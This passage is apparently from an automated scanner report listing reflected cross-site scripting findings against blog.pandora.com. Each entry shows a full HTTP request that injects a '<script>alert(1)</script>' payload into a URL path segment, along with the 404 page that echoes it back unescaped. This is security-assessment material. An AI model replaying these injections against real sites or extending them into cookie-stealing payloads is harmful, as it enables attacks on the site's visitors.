Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 369
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesa3828<script>alert(1)</script>87512ebd2ab/2010/11/fantastic-fargo.html was not found on this server.</p>
...[SNIP]...

1.282. http://blog.pandora.com/pandora/archives/2010/11/fantastic-fargo.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/11/fantastic-fargo.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 39bf5<script>alert(1)</script>8b77ea0b66d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/201039bf5<script>alert(1)</script>8b77ea0b66d/11/fantastic-fargo.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/201039bf5<script>alert(1)</script>8b77ea0b66d/11/fantastic-fargo.html was not found on this server.</p>
...[SNIP]...

1.283. http://blog.pandora.com/pandora/archives/2010/11/fantastic-fargo.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/11/fantastic-fargo.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a869d<script>alert(1)</script>14889bb3dee was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/11a869d<script>alert(1)</script>14889bb3dee/fantastic-fargo.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:31 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/11a869d<script>alert(1)</script>14889bb3dee/fantastic-fargo.html was not found on this server.</p>
...[SNIP]...

1.284. http://blog.pandora.com/pandora/archives/2010/11/fantastic-fargo.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/11/fantastic-fargo.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f3d62<script>alert(1)</script>1d21570497f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/11/fantastic-fargo.htmlf3d62<script>alert(1)</script>1d21570497f HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/11/fantastic-fargo.htmlf3d62<script>alert(1)</script>1d21570497f was not found on this server.</p>
...[SNIP]...

1.285. http://blog.pandora.com/pandora/archives/2010/11/sioux-falls-and.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/11/sioux-falls-and.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23985<script>alert(1)</script>089a1722201 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora23985<script>alert(1)</script>089a1722201/archives/2010/11/sioux-falls-and.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora23985<script>alert(1)</script>089a1722201/archives/2010/11/sioux-falls-and.html was not found on this server.</p>
...[SNIP]...

1.286. http://blog.pandora.com/pandora/archives/2010/11/sioux-falls-and.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/11/sioux-falls-and.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2c61d<script>alert(1)</script>b40d4c584c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives2c61d<script>alert(1)</script>b40d4c584c3/2010/11/sioux-falls-and.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives2c61d<script>alert(1)</script>b40d4c584c3/2010/11/sioux-falls-and.html was not found on this server.</p>
...[SNIP]...

1.287. http://blog.pandora.com/pandora/archives/2010/11/sioux-falls-and.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/11/sioux-falls-and.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5f834<script>alert(1)</script>c656c2ef387 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20105f834<script>alert(1)</script>c656c2ef387/11/sioux-falls-and.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20105f834<script>alert(1)</script>c656c2ef387/11/sioux-falls-and.html was not found on this server.</p>
...[SNIP]...

1.288. http://blog.pandora.com/pandora/archives/2010/11/sioux-falls-and.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/11/sioux-falls-and.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4a98f<script>alert(1)</script>e7866274f68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/114a98f<script>alert(1)</script>e7866274f68/sioux-falls-and.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/114a98f<script>alert(1)</script>e7866274f68/sioux-falls-and.html was not found on this server.</p>
...[SNIP]...

1.289. http://blog.pandora.com/pandora/archives/2010/11/sioux-falls-and.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/11/sioux-falls-and.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 83ec8<script>alert(1)</script>d52c4849003 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/11/sioux-falls-and.html83ec8<script>alert(1)</script>d52c4849003 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/11/sioux-falls-and.html83ec8<script>alert(1)</script>d52c4849003 was not found on this server.</p>
...[SNIP]...

1.290. http://blog.pandora.com/pandora/archives/2010/11/town-halls-this.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/11/town-halls-this.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2056f<script>alert(1)</script>3737c338528 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora2056f<script>alert(1)</script>3737c338528/archives/2010/11/town-halls-this.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2056f<script>alert(1)</script>3737c338528/archives/2010/11/town-halls-this.html was not found on this server.</p>
...[SNIP]...

1.291. http://blog.pandora.com/pandora/archives/2010/11/town-halls-this.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/11/town-halls-this.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb220<script>alert(1)</script>cbc4db6c337 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archiveseb220<script>alert(1)</script>cbc4db6c337/2010/11/town-halls-this.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archiveseb220<script>alert(1)</script>cbc4db6c337/2010/11/town-halls-this.html was not found on this server.</p>
...[SNIP]...

1.292. http://blog.pandora.com/pandora/archives/2010/11/town-halls-this.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/11/town-halls-this.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9fcff<script>alert(1)</script>f60856fbcd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20109fcff<script>alert(1)</script>f60856fbcd/11/town-halls-this.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 368
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20109fcff<script>alert(1)</script>f60856fbcd/11/town-halls-this.html was not found on this server.</p>
...[SNIP]...

1.293. http://blog.pandora.com/pandora/archives/2010/11/town-halls-this.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/11/town-halls-this.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b86f5<script>alert(1)</script>dbb2a670324 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/11b86f5<script>alert(1)</script>dbb2a670324/town-halls-this.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/11b86f5<script>alert(1)</script>dbb2a670324/town-halls-this.html was not found on this server.</p>
...[SNIP]...

1.294. http://blog.pandora.com/pandora/archives/2010/11/town-halls-this.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/11/town-halls-this.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 27a11<script>alert(1)</script>950dc27a619 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/11/town-halls-this.html27a11<script>alert(1)</script>950dc27a619 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/11/town-halls-this.html27a11<script>alert(1)</script>950dc27a619 was not found on this server.</p>
...[SNIP]...

1.295. http://blog.pandora.com/pandora/archives/2010/12/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/12/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bdac6<script>alert(1)</script>af1c2098b93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorabdac6<script>alert(1)</script>af1c2098b93/archives/2010/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorabdac6<script>alert(1)</script>af1c2098b93/archives/2010/12/ was not found on this server.</p>
...[SNIP]...

1.296. http://blog.pandora.com/pandora/archives/2010/12/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/12/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2a0b4<script>alert(1)</script>fcd5b5c5573 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives2a0b4<script>alert(1)</script>fcd5b5c5573/2010/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives2a0b4<script>alert(1)</script>fcd5b5c5573/2010/12/ was not found on this server.</p>
...[SNIP]...

1.297. http://blog.pandora.com/pandora/archives/2010/12/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/12/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bb68a<script>alert(1)</script>703abccb638 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010bb68a<script>alert(1)</script>703abccb638/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010bb68a<script>alert(1)</script>703abccb638/12/ was not found on this server.</p>
...[SNIP]...

